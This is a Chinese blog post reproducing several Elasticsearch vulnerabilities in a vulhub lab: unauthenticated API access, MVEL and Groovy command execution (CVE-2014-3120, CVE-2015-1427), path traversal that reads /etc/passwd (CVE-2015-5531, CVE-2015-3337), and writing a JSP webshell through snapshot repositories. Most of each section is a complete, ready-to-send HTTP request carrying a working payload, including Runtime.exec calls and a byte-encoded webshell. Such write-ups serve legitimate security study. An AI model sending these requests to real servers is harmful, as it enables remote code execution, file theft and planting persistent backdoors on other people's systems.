Elasticsearch 常见漏洞复现合集

最新推荐文章于 2025-03-23 21:31:27 发布
最新推荐文章于 2025-03-23 21:31:27 发布
阅读量1.3w 收藏 37
点赞数 11
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58434634/article/details/117338428
版权
本文探讨了Elasticsearch存在的多个安全漏洞,包括未授权访问、命令执行漏洞、沙盒绕过和目录穿越,介绍了复现步骤与影响版本。了解这些漏洞有助于提升对Elasticsearch的安全防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

Elasticsearch未授权访问

一、漏洞简介

ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。

二、影响版本

ALL

三、复现过程

复现环境

vulhub

复现步骤

直接get请求即可

http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。
http://xxxxxxxx:9200/_plugin/head/ web管理界面
http://xxxxxxxx:9200/_nodes 查看节点数据
http://xxxxxxxx:9200/_river/_search 查看数据库敏感信息

四、xpocsutie3检测

verify

在这里插入图片描述

ElasticSearch 命令执行漏洞(CVE-2014-3120)

一、漏洞简介

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。

二、影响版本

三、复现过程

复现环境

vulhub

复现步骤

该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。

插入一条新数据

POST /website/blog/ HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 32


{
  "name": "test"
}

在这里插入图片描述

命令执行

POST /_search?pretty HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 366


{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

在这里插入图片描述

四、xpocsutie3检测

verify

在这里插入图片描述

attack

在这里插入图片描述

ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)

一、漏洞简介

CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。

二、影响版本

三、复现过程

漏洞分析

ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:

  1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
  2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言

所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。

Java沙盒绕过法:

java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()

Goovy直接执行命令法:

def command='id';def res=command.execute().text;res
复现步骤

该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。

添加一条数据

POST /test/test/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 24


{
  "name": "test"
}

在这里插入图片描述

执行命令

POST /_search?pretty HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

在这里插入图片描述

四、xpocsutie3检测

verify

在这里插入图片描述

attack

在这里插入图片描述

ElasticSearch 目录穿越漏洞(CVE-2015-5531)(WooYun-2015-110216)

一、漏洞简介

elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。

WooYun-2015-110216 利用环境和CVE-2015-5531一致,可向服务器写入文件,如果服务器有web服务的话,可以向web目录写入webshell。

二、影响版本

1.6.1以下

三、复现过程

复现环境

vulhub

复现步骤

1.新建一个仓库

PUT /_snapshot/test HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 53

{"type": "fs", "settings": {"location": "/tmp/test"}}

在这里插入图片描述

2.创建一个快照

PUT /_snapshot/test2 HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 70

{"type": "fs","settings": {"location": "/tmp/test/snapshot-backdata"}}

在这里插入图片描述

3.读取文件

GET /_snapshot/test/backdata%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

在这里插入图片描述

Elasticsearch写入webshell漏洞(WooYun-2015-110216)

这个环境里没有web服务,测试向tmp/test目录写入webshell

1.创建一个恶意索引文档

POST /yz.jsp/yz.jsp/1 HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 228

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}

在这里插入图片描述

2.创建一个恶意的存储库,其中location的值即为要写入的路径

PUT /_snapshot/yz.jsp HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 118

{
     "type": "fs",
     "settings": {
          "location": "/tmp/test/",
          "compress": false
     }
}

在这里插入图片描述

3.存储库验证并创建

PUT /_snapshot/yz.jsp/yz.jsp HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 103

{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}

在这里插入图片描述

4.查看写入的webshell内容:

在这里插入图片描述

四、xpocsutie3检测

verify

在这里插入图片描述

attack

在这里插入图片描述

ElasticSearch 插件目录穿越漏洞(CVE-2015-3337)

一、漏洞简介

在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

二、影响版本

1.4.5以下/1.5.2以下

三、复现过程

复现环境

漏洞分析
复现步骤

这个除了要ES版本满足外,还需要使具有“site”功能的插件才可利用,测试时使用vulhub搭建失败,目前仅做记录,后续如果再遇到再补充

head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/ 即可看到

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):

在这里插入图片描述

在这里插入图片描述

web渗透测试漏洞复现Elasticsearch未授权漏洞复现
HACKONE的博客
03-18 3538
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在未授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 2266
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞,能够获取服务器敏感文件。...
ElasticSearch漏洞复现
hapenl的博客
01-06 1819
Elasticsearch(以下简称ES)是目前全文搜索引擎的首选。它是一个基于 Lucene 的搜索服务器,提供了一个分布式多用户能力的全文搜索引擎,它同时基于 RESTful Web 接口,可以快速地储存、搜索和分析海量数据。ES安装部署成功后,默认端口是9200。对ES中存储的数据进行查询分析,使用关键字_search。本文介绍了CVE-2014-3120和CVE-2015-1427漏洞复现
Elasticsearch未授权访问漏洞
最新发布
秦子腾
03-23 1336
执行设置用户名和密码的命令,这里需要为4个用户分别设置密码,elastic, kibana, logstash_system,beats_system。1、编辑elasticsearch.yml配置文件,添加认证相关配置。2、重启ElasticSearch。4、如果想要更新密码执行。
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 416
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
weixin_42675091的博客
04-03 443
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
BeesCMS4.0多处漏洞复现
1匹黑马
04-20 8699
文章目录前言漏洞复现后台报错注入 前言 本次复现漏洞有: 后台报错注入漏洞 文件上传漏洞 变量覆盖漏洞 Beescms v4.0由于后台登录设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入、文件上传、变量覆盖漏洞。现在依然有许多企业选用BeesCMS4.0,百度搜powerd by BEESCMS © 2010-2015 www.beescms.com 还是有很多站的: ...
漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现
2401_84437170的博客
04-17 1043
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
XXL-JOB executor 未授权访问漏洞复现
m0_53603468的博客
12-25 3103
概述 XXL-JOB executor 未授权访问漏洞 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全
常见端口对应的漏洞利用方式
聚鼎安全
12-14 2585
目录常见端口对应的漏洞利用方式文件共享服务端口远程连接服务端口Web应用服务端口数据库服务端口邮件服务端口网络参加协议端口特殊服务端口 常见端口对应的漏洞利用方式 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持
[Vulfocus解题系列]ElasticSearch命令执行漏洞(CVE-2014-3120)
00勇士王子的博客
07-04 1643
漏洞介绍 Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。 MVEL :一个被众多 Java 项目使用的开源的表达式语言。 Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。 影响版本
Elasticsearch 未授权访问漏洞复现
一纸荒芜的博客
10-31 9780
Elasticsearch 未授权访问漏洞
ElasticSearch 命令执行漏洞(CVE-2014-3120)
EnerY3的博客
12-12 1199
Elasticsearch 命令执行漏洞(CVE-2014-3120),它允许攻击者通过发送精心构造的请求到 Elasticsearch 服务器来执行任意操作系统命令。这个漏洞存在于 Elasticsearch 的早期版本中,并且在较新的版本中已经被修复。
ElasticSearch单机或集群未授权访问漏洞
爱辉弟的博客
12-18 4752
ElasticSearch未授权访问漏洞,使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口,其他的全部拒绝。并在ES节点上设置用户密码
漏洞预警:Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)
yuanlirong22的专栏
03-07 375
Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)。允许攻击者操纵应用程序的JavaScript对象和属性,可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中,该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中,它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。
未授权访问:Elasticsearch 未授权访问漏洞
qq_68163788的博客
05-19 3990
ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在未授权访问漏洞
Elasticsearch未授权访问漏洞复现
05-18
Elasticsearch未授权访问漏洞是指攻击者可以通过访问Elasticsearch的默认端口(9200)获取敏感信息,甚至可以对数据进行修改和删除。下面是一个简单的复现过程: 1. 下载安装Elasticsearch 首先需要下载并安装Elasticsearch,可以从官网 https://www.elastic.co/downloads/elasticsearch 下载适合自己操作系统的版本。安装完成后启动Elasticsearch。 2. 测试未授权访问 使用curl命令访问Elasticsearch的默认端口,可以看到返回的json格式数据,其中包含了Elasticsearch的版本信息、集群名称等。 ``` curl http://localhost:9200/ ``` 如果返回的结果中包含了类似以下内容,说明Elasticsearch存在未授权访问漏洞。 ``` { "name" : "node-1", "cluster_name" : "elasticsearch", "cluster_uuid" : "zZl94mWlQq6RQlN4WmAz5w", "version" : { "number" : "7.9.3", "build_flavor" : "default", "build_type" : "tar", "build_hash" : "c4138e51121ef06a6404866cddc601906fe5c868", "build_date" : "2020-10-16T10:36:16.141335Z", "build_snapshot" : false, "lucene_version" : "8.6.2", "minimum_wire_compatibility_version" : "6.8.0", "minimum_index_compatibility_version" : "6.0.0-beta1" }, "tagline" : "You Know, for Search" } ``` 3. 利用未授权访问漏洞 利用未授权访问漏洞可以进行一些危害性较大的操作,比如删除数据、创建索引等。这里我们只演示一下获取敏感信息的操作。 使用curl命令访问Elasticsearch中的某个索引,可以看到其中包含了一些敏感信息,比如用户名、密码等。 ``` curl http://localhost:9200/_cat/indices ``` 如果返回的结果中包含了类似以下内容,说明存在敏感信息泄露。 ``` yellow open .kibana_task_manager_1 6rJQh5E8R0yUH9WdPQzLrw 1 1 3 0 35.4kb 35.4kb yellow open .kibana_1 5QZvZnS-QOyvZBTl2t6bKg 1 1 2 0 13.4kb 13.4kb ``` 4. 解决方法 为避免Elasticsearch的未授权访问漏洞,可以进行以下操作: - 修改配置文件中的network.host配置,限制Elasticsearch只能在特定的IP地址或网段上运行。 - 启用Elasticsearch的安全特性,比如启用访问控制、数据加密等。 以上是Elasticsearch未授权访问漏洞的简单复现过程,希望对您有帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值